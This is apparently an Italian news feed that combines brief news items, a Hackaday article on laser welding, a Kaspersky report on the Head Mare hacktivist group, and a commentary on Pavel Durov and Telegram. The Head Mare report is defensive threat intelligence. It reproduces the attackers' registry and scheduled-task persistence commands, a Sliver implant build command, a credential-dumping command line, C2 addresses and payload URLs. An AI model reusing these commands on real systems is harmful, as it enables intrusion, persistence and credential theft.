Salta al contenuto principale


LIBRI. Laboratorio Palestina: l’esperienza sul campo si vende in armi


@Notizie dall'Italia e dal mondo
Antony Loeweisten, giornalista investigativo australiano, traccia la linea delle relazioni tra l’industria bellica israeliana e molti paesi del mondo. La vendita di armi emerge come priorità impellente per Tel Aviv a dispetto della natura politica dell’acquirente
L'articolo



Perù: FSC sospende la certificazione alla società di disboscamento, una vittoria per le organizzazioni indigene


@Notizie dall'Italia e dal mondo
La revoca completa della certificazione è stata richiesta dalle organizzazioni indigene peruviane in seguito alla pubblicazione delle immagini che mostrano che l'area è abitata da un



GAZA. Israele costruisce un nuovo corridoio per il controllo permanente


@Notizie dall'Italia e dal mondo
Cominciata a inizio novembre, secondo il Forensic Architecture, la costruzione della strada è costata la distruzione di fattorie, terreni agricoli, abitazioni, frutteti e garantirà alle truppe un accesso sicuro fin dentro Gaza City
L'articolo GAZA. Israele



The Strangest Way to Stick PLA to Glass? With a Laser and a Bit of Foil


18910336

Ever needed a strong yet adhesive-free way to really stick PLA to glass? Neither have we, but nevertheless there’s a way to use aluminum foil and an IR fiber laser to get a solid bond with a little laser welding between the dissimilar materials.
18910338A piece of sacrificial aluminum foil bonds the PLA to glass with a form of laser welding, with precise control and very little heat to dissipate.
It turns out that aluminum can be joined to glass by using a pulsed laser process, and PLA can be joined to aluminum with a continuous wave laser process. Researchers put them together, and managed to reliably do both at once with a single industrial laser.

By putting a sacrificial sheet of thin aluminum foil between 3D printed PLA and glass, then sending the laser through the glass into the aluminum, researchers were able to bond it all together in an adhesive-free manner with precise control, and very little heat to dissipate. No surface treatment of any kind required. The bond is at least as strong as any adhesive-based solution, so there’s no compromising on strength.

When it comes to fabrication, having to apply and manage adhesives is one of the least-preferable options for sticking two things together, so there’s value in the idea of something like this.

Still, it’s certainly a niche application and we’ll likely stick to good old superglue, but we honestly didn’t know laser welding could bond aluminum to glass or to PLA, let along both at once like this.


hackaday.com/2024/09/02/the-st…



Head Mare: adventures of a unicorn in Russia and Belarus


18901323

Head Mare is a hacktivist group that first made itself known in 2023 on the social network X (formerly Twitter)[1]. In their public posts, the attackers reveal information about some of their victims, including organization names, internal documents stolen during attacks, and screenshots of desktops and administrative consoles.

By analyzing incidents in Russian companies, we identified how Head Mare conducts its attacks, the tools it uses, and established the group’s connection with the PhantomDL malware (article in Russian).

Key findings


  • Head Mare exclusively targets companies in Russia and Belarus.
  • For initial access, the group conducts various phishing campaigns distributing RAR archives that exploit the CVE-2023-38831 vulnerability in WinRAR.
  • Some of the discovered tools overlap with previously investigated groups attacking Russian organizations.
  • The group encrypts victims’ devices using two ransomware families: LockBit for Windows and Babuk for Linux (ESXi).


Technical details

Historical context


Since the beginning of the Russo-Ukrainian conflict, we’ve seen the emergence of numerous hacktivist groups whose main goal is often not financial gain but causing as much damage as possible to companies on the opposing side of the conflict. Head Mare is one such group, exclusively targeting organizations located in Russia and Belarus. This is confirmed by open-source information and telemetry from the Kaspersky Security Network – a system for collecting anonymized threat data voluntarily provided by users of our solutions.

Hacktivist groups attacking Russian organizations in the context of the Russo-Ukrainian conflict use similar techniques and tools and, when analyzed using the Unified Kill Chain method, generally resemble one another. However, unlike other similar groups, Head Mare uses more up-to-date methods for obtaining initial access. For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which allows the attacker to execute arbitrary code on the system via a specially prepared archive. This approach allows the group to deliver and disguise the malicious payload more effectively.

Like most hacktivist groups, Head Mare maintains a public account on the social network X, where they post information about some of their victims. Below is an example of one of their posts:

Head Mare post on X
Head Mare post on X

At the time of carrying out the study, the group has claimed nine victims from various industries:

  • Government institutions;
  • Transportation;
  • Energy;
  • Manufacturing;
  • Entertainment.

The ultimate goal of the attackers is likely to cause maximum damage to companies in Russia and Belarus. However, unlike some other hacktivist groups, Head Mare also demands a ransom for data decryption.

Head Mare’s toolkit


In their attacks, Head Mare mainly uses publicly available software, which is typical of most hacktivist groups targeting Russian companies in the context of the Russo-Ukrainian conflict. However, while some hacktivists have no proprietary developments in their toolkit at all, Head Mare uses their custom malware PhantomDL and PhantomCore in phishing emails for initial access and exploitation.

Below is a list of software discovered in Head Mare attacks:

  • LockBit ransomware;
  • Babuk ransomware;
  • PhantomDL;
  • PhantomCore;
  • Sliver;
  • ngrok;
  • rsockstun;
  • XenAllPasswordPro;
  • Mimikatz.

Most of these tools are available on the internet, be it LockBit samples generated using the publicly available builder leaked in 2022, or the Mimikatz utility, whose code is available on GitHub.

Initial access


During our investigation of Head Mare’s activities, we discovered that this group is associated with targeted attacks on Russian organizations using malicious PhantomDL and PhantomCore samples. The detected samples were distributed in various phishing campaigns in archives with decoy documents of the same name. The malicious archives exploit the CVE-2023-38831 vulnerability in WinRAR. If the user attempts to open the legitimate-seeming document, they trigger the execution of the malicious file. The same sample could be distributed in different archives with decoy documents on various topics.

Verdicts with which our products detect PhantomDL samples: the malware is recognized, among other things, as an exploit for CVE-2023-38831.
Verdicts with which our products detect PhantomDL samples: the malware is recognized, among other things, as an exploit for CVE-2023-38831

After execution, PhantomDL and PhantomCore establish communication with one of the attackers’ command servers and attempt to identify the domain to which the infected host belongs. Below are the results of dynamic analysis of several samples in Kaspersky Sandbox (detonation graphs), reflecting the malware’s behavior immediately after launch.

Detonation graph of a PhantomDL sample reflecting its behavior in Kaspersky Sandbox
Detonation graph of a PhantomDL sample reflecting its behavior in Kaspersky Sandbox

In the image above, the PhantomDL sample connects to the C2 server 91.219.151[.]47 through port 80 and performs domain identification using the command
cmd.exe /c "echo %USERDOMAIN%".
PhantomDL communication with C2
PhantomDL communication with C2

The PhantomCore sample establishes a connection with another C2 (45.11.27[.]232) and checks the host’s domain using the WinAPI function
NetGetJoinInformation.
PhantomCore sample detonation in Kaspersky Sandbox
PhantomCore sample detonation in Kaspersky Sandbox

Suspicious activity of the PhantomCore sample
Suspicious activity of the PhantomCore sample

Another PhantomCore sample, after execution, establishes a connection with C2 5.252.178[.]92:

PhantomCore C2 connection
PhantomCore C2 connection

During our research, we also found several PhantomDL and PhantomCore samples, which we cannot attribute with complete certainty to the same cluster of activity as the samples found in Head Mare’s attacks. Information about these samples can be found in the section “Samples similar to Head Mare’s toolkit”.

Persistence in the system


The attackers used several methods to persist in the system. For example, in one incident, they added a PhantomCore sample to the Run registry key. After execution, the sample automatically established a connection with the attackers’ C2 5.252.176[.]47:

PhantomCore C2 connection
PhantomCore C2 connection

We observed the following commands adding a value to the Run registry key:

CommandDescription
cmd /c “cd /d $selfpath\ && reg add
HKCU\Software\Microsoft\Windows\CurrentVersion
\Run /v \”MicrosoftUpdateCoree\” /t REG_SZ /d
\”$selfpath\$selfname.exe\ /f”
Adding a value to the Run registry key named MicrosoftUpdateCoree with content $appdata\Microsoft\Windows\srvhostt.exe (PhantomCore) with the /f parameter (no confirmation prompt)
reg add
HKCU\Software\Microsoft\Windows\CurrentVersion
\Run /v \”MicrosoftUpdateCoree\” /t REG_SZ /d
\”$appdata\Microsoft\Windows\srvhostt.exe\” /f
reg add
HKCU\Software\Microsoft\Windows\CurrentVersion
\Run /v \”MicrosoftUpdateCore\” /t REG_SZ /d
\”$appdata\Microsoft\Windows\srvhost.exe\” /f
A similar method of adding to the registry key, but the value is named MicrosoftUpdateCore

In some other cases, the attackers created scheduled tasks to persist in the victim’s system. The following tasks were used to launch a PhantomCore sample:

CommandDescription
schtasks /create /tn \”MicrosoftUpdateCore\”
/tr \”$appdata\Microsoft\Windows\srvhost.exe\”
/sc ONLOGON
Creates a scheduled task named MicrosoftUpdateCore that launches $appdata\Microsoft\Windows\srvhost.exe (PhantomCore) each time the user logs in
schtasks /create /tn “MicrosoftUpdateCore” /tr
“$appdata\Microsoft\Windows\srvhost.exe” /sc
ONLOGON /ru “SYSTEM”
A similar method of creating a scheduled task, but in this case, the task runs with SYSTEM privileges
Detection evasion


As mentioned in the previous section, the attackers create scheduled tasks and registry values named MicrosoftUpdateCore and MicrosoftUpdateCoree to disguise their activity as tasks related to Microsoft software.

We also found that some LockBit samples used by the group had the following names:

  • OneDrive.exe;
  • VLC.exe.

These samples were located in the C:\ProgramData directory, disguising themselves as legitimate OneDrive and VLC applications.

In general, many of the tools used by Head Mare had names typical of legitimate programs and were located in standard paths or lookalikes:

SoftwarePath
SliverC:\Windows\system32\SrvLog.exe
rsockstunc:\Users\<user>\AppData\Local\microsoft\windows\srvhosts.exe
c:\Users\<user>\AppData\Roaming\microsoft\windows\srvhostt.exe
Phantomc:\windows\srvhost.exe
c:\Users\<user>\appdata\roaming\microsoft\windows\srvhost.exe
LockBitc:\ProgramData\OneDrive.exe

As can be seen in the table, the attackers primarily attempted to disguise their samples as legitimate svchost.exe files in the C:\Windows\System32 directory.

The attackers also used disguise tactics in their phishing campaigns – samples of PhantomDL and PhantomCore were named to resemble business documents and had double extensions. Here are some examples we encountered:

  • Счет-Фактура.pdf .exe
  • договор_ №367кх_от_29.04.2024_и_доп_соглашение_ртсс 022_контракт.pdf .exe
  • решение №201-5_10вэ_001-24 к пив экран-сои-2.pdf .exe
  • тз на разработку.pdf .exe
  • исходящее письмо от 29.04.2024 n 10677-020-2024.pdf .exe
  • возврат средств реквизиты.pdf .exe

Additionally, all the samples of PhantomDL and PhantomCore we found were obfuscated, possibly using a popular obfuscator for Go called Garble.

Management and infrastructure


During our research, we discovered that the main C2 framework used by the attackers is Sliver, an open-source C2 framework designed for simulating cyberattacks and pentesting. Such frameworks are used to manage compromised systems after initial access, allowing attackers (or pentesters) to execute commands, gather data, and manage connections.

Sliver’s architecture includes an agent (implant) installed on compromised devices to execute commands from the server, a server for managing agents and coordinating their actions, and a client in the form of a command-line interface (CLI) for operator-server interaction. Sliver’s core functionality includes managing agents, executing commands via a command shell, creating tunnels to bypass network restrictions, and automating routine tasks with built-in scripts.

The Sliver implant samples we found had default configurations and were created using the following command:
generate --http [IP] --os windows --arch amd64 --format exe
To disguise the implants, the attackers used the popular Garble tool, which is available on GitHub.

The attackers also frequently used VPS/VDS servers as C2 servers. Below is a list of servers we observed in attacks:

IPFirst detectionASN
188.127.237[.]46March 31, 202256694
45.87.246[.]169June 26, 2024212165
45.87.245[.]3057494
185.80.91[.]107July 10, 2024212165
91.219.151[.]47May 02, 202456694
5.252.176[.]4739798
5.252.176[.]77October 29, 202339798

Various utilities used at different stages of the attacks were found on the attackers’ C2 servers. The same utilities often appeared on different servers with identical file names.

Analysis of Head Mare's C2 infrastructure
Analysis of Head Mare’s C2 infrastructure

Below is a list of tools found on one of the attackers’ command servers:

Contents of one of the C2 server directories
Contents of one of the C2 server directories

Utility nameDescription
2000×2000.phpPHP shell for executing commands on the server. This shell is called p0wny@shell:~# and is available on GitHub at hxxps://github[.]com/flozz/p0wny-shell.
LEGISLATIVE_COUSIN.exeSliver implant.
Connects to 5.252.176[.]77:8888.
SOFT_KNITTING.exe
sherlock.ps1PowerShell script for quickly finding vulnerabilities for local privilege escalation, available on GitHub at hxxps://github[.]com/rasta-mouse/Sherlock/tree/master.
ngrok.exengrok utility.
reverse.exeMeterpreter.
Connects to 5.252.176[.]77:45098.
servicedll.exenssm utility for managing services.
sysm.elfUnix reverse shell using the sys_connect function to connect to the attacker’s C2. If the connection attempt fails, the program enters sleep mode for 5 seconds using the sys_nanosleep function before trying again. Connects to 5.252.176[.]77:45098.
Xmrig*XMRig miner. Not used in any attacks known to us.
Pivoting


Pivoting is a set of methods that allow an attacker to gain access to private network segments using compromised machines as intermediate nodes. For this purpose, the attackers use the ngrok and rsockstun utilities.

The rsockstun utility creates a reverse SOCKS5 tunnel with SSL and proxy server support. It allows a client behind a NAT or firewall to connect to a server via a secure connection and use SOCKS5 to forward traffic.

We analyzed the utility’s code and identified its key functions:

ClientServer
ConnectViaProxy function:
  • Establishes a connection with the server through a proxy.
  • Supports NTLM authentication for proxy servers.
  • Creates and sends requests to the proxy server and processes responses.

ConnectForSocks function:

  • Establishes a connection with the server via SOCKS5.
  • Establishes an SSL connection to the server.
  • Authenticates using a password.
  • Creates a Yamux session for multiplexing connections.
listenForSocks function:
  • Waits for client connections via SSL.
  • Verifies the existence and correctness of the connection password.
  • Creates a Yamux client session.

listenForClients function:

  • Waits for local client connections.
  • Opens a Yamux stream and forwards traffic between the local client and the remote server.

Fragment of rsockstun code containing one of the Head Mare C2 addresses
Fragment of rsockstun code containing one of the Head Mare C2 addresses

Ngrok is a cross-platform utility designed to create secure tunnels to local web servers over the internet. It allows quick and easy access to local services and applications by providing public URLs that can be used to access the server externally.

Network exploration


After successfully gaining a foothold on the initial node, attackers execute a series of commands to further explore the node, domain, and network environment:

CommandDescription
cmd /c “echo %USERDOMAIN%”Retrieve the victim’s domain name
arp -aRetrieve the ARP cache for all network interfaces on the compromised system
“cmd /c “cd /d $selfpath && whoamiGather information about the current user’s name and domain
cmd /c “cd /d $appdata && powershell Get-ScheduledTask -TaskName “WindowsCore”Search for a scheduled task named WindowsCore
Credential harvesting


To collect credentials, attackers use the mimikatz utility.

In addition, to obtain additional credentials from the system, attackers use the console version of the XenArmor All-In-One Password Recovery Pro3 utility (XenAllPasswordPro), which can extract user credentials from registry hives.
"c:\ProgramData\update\XenAllPasswordPro.exe" -a
"c:\ProgramData\update\report.html"

End goal: file encryption


While studying Head Mare attacks, we discovered the use of two ransomware families:

  • LockBit for Windows;
  • Babuk for ESXi.


Babuk


The Babuk variant we discovered is a 64-bit build for ESXi, created using a publicly available configurator. The Trojan uses standard encryption algorithms for Babuk builds for ESXi – X25519 + SHA256 + Sosemanuk, as well as the standard extension for encrypted files, *.babyk.

Kaspersky Threat Attribution Engine results for the found Babuk samples
Kaspersky Threat Attribution Engine results for the found Babuk samples

The distinctive features of the discovered Trojan are:

  • Ability to log its activities in /tmp/locker.log.
  • Ability to destroy running virtual machines, the list of which is taken from the vm-list.txt file. This file is populated when the esxcli vm process listd command is called.

The Babuk sample we found encrypts files with the following extensions:

.vmdk.vmem.vswp
.vmsn.bak.vhdx

After encryption is complete, it leaves a ransom note. Below is an example of the note, which contains a unique identifier for the Session messenger and the message “Message us for decryption ^_^.”

Babuk sample ransom note
Babuk sample ransom note

LockBit


The LockBit builds we found in Head Mare attacks are identical to samples generated by the publicly available LockBit builder, which was leaked online in 2022. The attackers distributed LockBit under the following names:

  • lb3.exe
  • lock.exe
  • OneDrive.exe
  • lockbithard.exe
  • lockbitlite.exe
  • phdays.exe
  • l.exe
  • VLC.exe

The ransomware was located in the following paths:

  • c:\Users\User\Desktop;
  • c:\ProgramData\.

The attackers used two of these ransomware versions sequentially – lockbitlite.exe and then lockbithard.exe. First, they encrypted files using LockbitLite, and then additionally encrypted the output with the LockbitHard variant.

The configuration of these variants differed slightly.

LockbitLiteLockbitHard
“encrypt_filename”: false,“encrypt_filename”: true,
“wipe_freespace”: false,“wipe_freespace”: true,
“white_folders”: “$recycle.bin;config.msi;$windows.~bt;$w
indows.~ws;windows;boot”,
“white_folders”: “”,

Examples of the notes from both samples, which are generated when the Trojan is created in the configurator, are presented below.

Ransom note from LockBit sample
Ransom note from LockBit sample

Ransom note from another LockBit sample
Ransom note from another LockBit sample

Victimology


According to Kaspersky Threat Intelligence, all samples related to Head Mare were detected only in Russia and Belarus. The screenshot below shows the analysis of the PhantomDL sample on the Threat Intelligence Portal.

Information about the PhantomDL sample from TIP
Information about the PhantomDL sample from TIP

Samples similar to Head Mare’s toolkit


To get a more complete picture, we analyzed samples seen in Head Mare attacks using the Similarity technology, which helps us find similar malware samples. While we can’t say for certain that the discovered files were also used by Head Mare, their similarity may help in attributing cyberattacks and further analyzing the group’s activities.

PhantomDL
MD5 of the original sampleMD5 of similar samples
15333D5315202EA428DE43655B598EDAA2BD0B9B64FBDB13537A4A4A1F3051C0
PhantomCore
MD5 of the original sampleMD5 of similar samples
16F97EC7E116FE3272709927AB07844E855B1CBA23FB51DA5A8F34F11C149538
55239CC43BA49947BB1E1178FB0E97480E14852853F54023807C999B4FF55F64
99B0F80E9AE2F1FB15BFE5F068440AB8
LockBit
MD5 of the original sampleMD5 of similar samples
76B23DD72A883D8B1302BB4A514B7967 6DDC56E77F57A069539DCC7F97064983
7ACC6093D1BC18866CDD3FECCB6DA26A
59242B7291A77CE3E59D715906046148
6568AB1C62E61237BAF4A4B09C16BB86F7ABDAAE63BF59CA468124C48257F752
79D871FF25D9D8A1F50B998B28FF752D
78CC508882ABA99425E4D5A470371CB1
1D2D6E2D30933743B941F63E767957FB

Conclusions


The tactics, methods, procedures, and tools used by the Head Mare group are generally similar to those of other groups associated with clusters targeting organizations in Russia and Belarus within the context of the Russo-Ukrainian conflict. However, the group distinguishes itself by using custom-made malware such as PhantomDL and PhantomCore, as well as exploiting a relatively new vulnerability, CVE-2023-38831, to infiltrate the infrastructure of their victims in phishing campaigns. This is an important aspect that Russian and Belarusian organizations should pay attention to: attackers are evolving and improving their TTPs.

Indicators of compromise


Please note: The network addresses provided in this section are valid at the time of publication but may become outdated in the future.

Hashes:
201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8
9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69
08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470
6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263
33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A
5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03
9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0
5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9
DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA
053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD
2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921
015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343
9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546
22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3
2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569
AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F
9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836
B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984
92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50
664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38
311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86
4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271
2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50
DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E
EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B

File paths:
$appdata\Microsoft\Windows\srvhostt.exe
$appdata\Microsoft\Windows\srvhost.exe
C:\Windows\system32\SrvLog.exe
c:\Users\User\AppData\Local\microsoft\windows\srvhosts.exe
c:\windows\srvhost.exe
c:\ProgramData\OneDrive.exe
c:\ProgramData\update\XenAllPasswordPro.exe
c:\ProgramData\update\report.html
$user\desktop\rsockstun.exe
C:\ProgramData\resolver.exe
$user\desktop\lockbitlite.exe
$user\desktop\lb3.exe
C:\ProgramData\lock.exe
$user\desktop\x64\mimikatz.exe
c:\Users\User\Documents\srvhost.exe
c:\microsoft\windows\srchost.exe

IP addresses
188.127.237[.]46
45.87.246[.]169
45.87.245[.]30
185.80.91[.]107
188.127.227[.]201
5.252.176[.]47
45.11.27[.]232

URLs
188.127.237[.]46/winlog.exe
188.127.237[.]46/servicedll.exe
194.87.210[.]134/gringo/splhost.exe
194.87.210[.]134/gringo/srvhost.exe
94.131.113[.]79/splhost.exe
94.131.113[.]79/resolver.exe
45.156.21[.]178/dlldriver.exe
5.252.176[.]77/ngrok.exe
5.252.176[.]77/sherlock.ps1
5.252.176[.]77/sysm.elf
5.252.176[.]77/servicedll.rar
5.252.176[.]77/reverse.exe
5.252.176[.]77/soft_knitting.exe
5.252.176[.]77/legislative_cousin.exe
5.252.176[.]77/2000×2000.php


[1] x.com/head_mare is the account supposedly associated with the hacktivist group. Use this source with caution.


securelist.com/head-mare-hackt…



#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


Pavel Durov, Telegram: la libertà di espressione non è priva di responsabiltà


L’”arresto” di Pavel Durov all’aeroporto Parigi-Le Bourget, poco dopo essere atterrato su un jet privato proveniente da Baku (Azerbaigian) non solo possiede contorni poco nitidi, ma ha scatenato il caos, le critiche di Elon Musk sulla libertà di parola, quelle di Edward Snowden sulla libertà di espressione e associazione e gli interventi degli Emirati Arabi e della Russia, affinché i suoi diritti fossero rispettati. Contemporaneamente però sono arrivate anche parole dure, tra queste quelle di Dmitry Medvedev – Vicepresidente del Consiglio di Sicurezza della Federazione Russa – sul suo canale Telegram. In passato infatti a Durov il governo russo chiese di collaborare con le forze dell’ordine. In risposta al suo rifiuto Medvedev gli avrebbe risposto: “Allora sarai in grossi guai con tutti i paesi”. “Ha sbagliato i calcoli“, scrive Medvedev “per tutti i nostri comuni nemici lui è russo e per questo imprevedibile e pericoloso […] Durov deve capire che la Patria non è scelta“. Tuttavia, dopo aver lasciato la Russia, Durov vi sarebbe tornato diverse decine di volte, almeno sino allo scoppio della guerra in Ucraina, questo secondo un rapporto di Important Stories, basato su una fuga di dati dell’intelligence russa.

IN BREVE:

  • Pavel Durov / Telegram: tre capi di imputazione riguardano la crittografia
  • Una questione politica o di sicurezza?
  • Non tutti i messaggi di telegram sono criptati di default
  • Si può giocare da soli contro tutto il mondo?
  • Mike Benz: Telegram è un potente veicolo per mobilitare le proteste
  • Proteggere i dati degli utenti “a tutti i costi”
  • L’età oscura dell’informazione: “The hacker spirit breaks any spell”

18898716Fonte: Dmitry Medevedev su X

Pavel Durov / Telegram: tre capi di imputazione riguardano la crittografia


Ma alla base della custodia cautelare di Durov – di patria russo ma che ha la doppia cittadinanza francese e quella degli Emirati Arabi Uniti, a cui si aggiunge la cittadinanza dell’isola caraibica di Saint Kitts e Nevis – non compare il nome di Vladimir Putin. L’indagine preliminare – aperta l’8 luglio “contre personne non dénommée” – come recita la comunicazione della Procura della Repubblica francese – da parte del Centro per il contrasto alla criminalità digitale (C3N) e all’Ufficio nazionale antifrode (ONAF), contiene 12 capi d’imputazione tra cui tre che riguardano la crittografia:

  • Fornitura di servizi di crittografia volti a garantire funzioni di riservatezza senza dichiarazione conforme,
  • Fornitura di mezzi di crittografia che non garantiscano esclusivamente funzioni di autenticazione o di controllo dell’integrità senza previa dichiarazione,
  • Importazione di un mezzo di crittografia che non fornisce esclusivamente funzioni di autenticazione o di controllo dell’integrità senza previa dichiarazione.

Secondo un investigatore locale Durova sapeva di essere ricercato, il che sarebbe collimante con le dichiarazioni del canale Telegram: “Durov non ha nulla da nascondere”. Le accuse però sono anche quelle di essersi rifiutato di di comunicare alle autorità “le informazioni o i documenti necessari per effettuare e sfruttare le intercettazioni autorizzate dalla legge”. In men che non si dica la notizia ha scatenato una serie di attacchi Ddos contro siti web governativi francesi e in questo quadro non solo la commissione Europa ha aperto un’inchiesta parallela per sincerarsi che il Digital Services Act (Dsa) non sia stato ‘violato’ – dichiarando anche di avere un modo per determinare quanto siano accurati i dati sui cittadini europei (?) – un’indagine è stata aperta anche dal Cybercrime Coordination Centre (I4C) indiano. Sembra quindi essere solo l’inzio. Intanto il CEO di Telegram è stato rilasciato dietro una cauzione di 5 milioni di euro e non può lasciare la Francia, con l’obbligo di presentarsi due volte a settimana in una stazione di polizia. Non è ancora però chiaro che tipo di pressione potrebbe essere esercitata per liberarlo.

Una questione politica o di sicurezza?


Dimitri Peskov, ha avvertito che i procedimenti giudiziari contro un “cittadino russo” non dovrebbero “trasformarsi in persecuzione politica”, tuttavia se si trattasse di una questione politica – che Macron assolutamente nega riportando le decisioni ai giudici ai quali spetta stabilire se le leggi o di diritti umani siano stati infranti – non sarebbe la prima volta: in un’ intervista passata di Tucker Carlson, Durov spiega come mai si terrebbe lontano – per suddetti motivi – da Russia, Cina e Stati Uniti. Alcuni governi – sue parole – infatti hanno cercato di fargli pressione ma l’app dovrebbe rimanere una piattaforma neutrale e non un “attore nella geopolitica”. “Preferirei essere libero piuttosto che prendere ordini da chiunque”.

Per poi dissipare ogni dubbio sulla cittadinanza francese di Durov sarebbe intervenuto Macron: avrebbe infatti dichiarato di avergli concesso personalmente il passaporto -procedura eseguita anche per il CEO americano di Snapchat, Evan Spiegel – decisione che risalirebbe ad un incontro del 2018 rimasto segreto e durante il quale era stato chiesto a Durov di trasferire la sede dell’app di messaggistica nella capitale francese. Ad oggi però la sede è a Dubai. E’ poi il Wall Street Journal a rivelare che nel 2018 lo smartphme di Durov era sotto il controllo dell’intelligence francese in un’operazione congiunta con gli Emirti Arabi Uniti nell’ambito di un’operazione contro lo Stato islamico che usava l’applicazione per reclutare militanti e pianificare attentati.

Non tutti i messaggi di telegram sono criptati di default


Tuttavia, il founder dell’app Signal, Moxie Marlinspike su X ha chiarito che: “I messaggi di Telegram non sono criptati E2E (almeno in deafult). È anche un “cloud messenger”, il che significa che tutti i messaggi risiedono sui server di Telegram anziché sul dispositivo dell’utente. Con una query, il team russo di Telegram può ottenere ogni messaggio inviato o ricevuto dal presidente francese ai suoi contatti, ogni messaggio inviato o ricevuto da quei contatti ai loro contatti, ogni messaggio inviato o ricevuto dai contatti di quei contatti, ecc”.

È solo testo in chiaro” osserva Marlinspike “non ci sono limiti a ciò che possono fare, come usare un LLM per esaminare tutto quel materiale e tirare fuori lo sporco, mappare le relazioni, capire chi nasconde segreti a chi, ecc. Per i politici e i membri del gabinetto francesi, è un po’ troppo tardi per fare qualcosa. Anche se provassero a eliminare tutti i loro messaggi ora, il team di Telegram potrebbe semplicemente contrassegnare i messaggi come “eliminati” in modo che non vengano più visualizzati dall’utente, ma non eliminerebbe effettivamente i dati a cui mantengono l’accesso”.

Ora riguardo a ciò che è successo in Francia, Politico in un articolo del 27 agosto ci spiega qualcosa che potrebbe sembrarci scontato: “Basta aprire la chat Telegram di chiunque faccia parte dell’orbita politica francese e si noteranno legislatori, membri del governo e consiglieri presidenziali online o connessi di recente”. Lo stesso presidente francese Emanuel Macron utilizza Telegram. E proprio quando Pavel Durov era sotto custodia, un ex parlamentare francese ha mostrato a Politico l’accesso recente del presidente Macron a Telegram. Ma il problema nn riguarda solo i politici francesi, bensì i nazionalisti ucraini e russi che conducono proprio su Telegram le loro guerre di propaganda.

18898718Fonte: Emanuel Macron, Telegram

Già nel novembre 2023, il governo francese per voce del primo ministro – Élisabeth Borne – aveva avvisato ministri e team di lavoro di non usare app di messggistica come WhatsApp, Telegram e Signal, sottolineando che “questi strumenti digitali non sono privi di falle di sicurezza e pertanto non possono garantire la sicurezza delle conversazioni e delle informazioni condivise tramite essi”. Consentite invece le app francesi Tchap e Olvid, certificata dall’agenzia francese per la sicurezza informatica ANSSI.

Si può giocare da soli contro tutto il mondo?


Ma Pavel Durov non è solo. Anche Elon Musk con X ha le sue grane: la corte suprema del Brasile infatti non solo ha fatto sospendere l’app bloccando l’accesso degli utenti alla piattaforma, tanto da fare aumentare vertiginosamente l’utilizzo delle VPN nel paese, ma sta rendendo difficile la vita anche a Starlink bloccando le transazioni finanziarie. La motivazione dichiarata? La richiesta di bloccare determinati account, accusati di diffondere fake news, che Musk ha definito “censura”. Così a controllare i contenuti pubblicati dagli utenti non sarebbe solo il “Deep State” americano.

A tutto ciò si aggiunge la lettera ufficiale di Mark Zuckerberg, il quale il 26 agosto ha inviato una lettera al repubblicano Jim Jordan ha ammesso di aver ceduto al pressing della Casa Bianca per la censura di alcuni contenuti relativi al Covid-19 contro la sua volontà. Oltre a ciò nella lettera viene chiarito che l’FBI li aveva avvertito circa un’operazione di disinformazione russa sulla famiglia Biden e Zuckerberg ammette di aver così declassato la storia e avere scoperto invece che si trattava di una notizia genuina: “non avremmo dovuto declassare la storia”. Allo stesso tempo ha dichiarato che il suo obiettivo in questa campagna presidenziale sia quello di rimanere neutrale.

18898720Fonte: House Judiciary GOP su X

Mike Benz: Telegram è un potente veicolo per mobilitare le proteste


Nell’intervista di Tucker Carlson a Mike Benz emergono fatti più o meno noti riguardo la vicenda Pavel Durov/Telegram. C’è motivo di pensare che USA e Francia abbiano condiviso intelligence militare ed interessi diplomatici ed economici nell’arrestare Pavel, per ottenere finalmente il controllo su Telegram, la pratica di moderazione dei contenuti, il divieto di tutti i canali di propaganda russi, dall’Ucraina alla Bielorussia all’Africa subsahariana, e l’accesso back-end per leggere efficacemente ogni messaggio di testo russo o meno. Dall’altra parte invece la Russia ha un accesso al backend di Telegram? La risposta secondo Benz è no. Nel cao però che “lo abbia decifrato tramite i suoi hacker informatici o che Pavel avesse qualche accordo segreto, potrebbe includere il fatto che se ogni rivoluzione colorata organizzata su Telegram possa essere monitorata segretamente dai russi allora questo potrebbe essere il motivo per cui molte di quest non hanno avuto successo”.

Mike Benz, direttore della Foundation for Freedom Online, ex funzionario del Dipartimento di Stato (con responsabilità nella formulazione e negoziazione della politica estera degli Stati Uniti su questioni di comunicazioni internazionali e tecnologie dell’informazione) – assicura: se non c’è libertà di parola “non c’è movimento politico che puoi rafforzare le capacità per cambiare il regime del governo o per mantenere elementi di controllo sul governo esistente”.

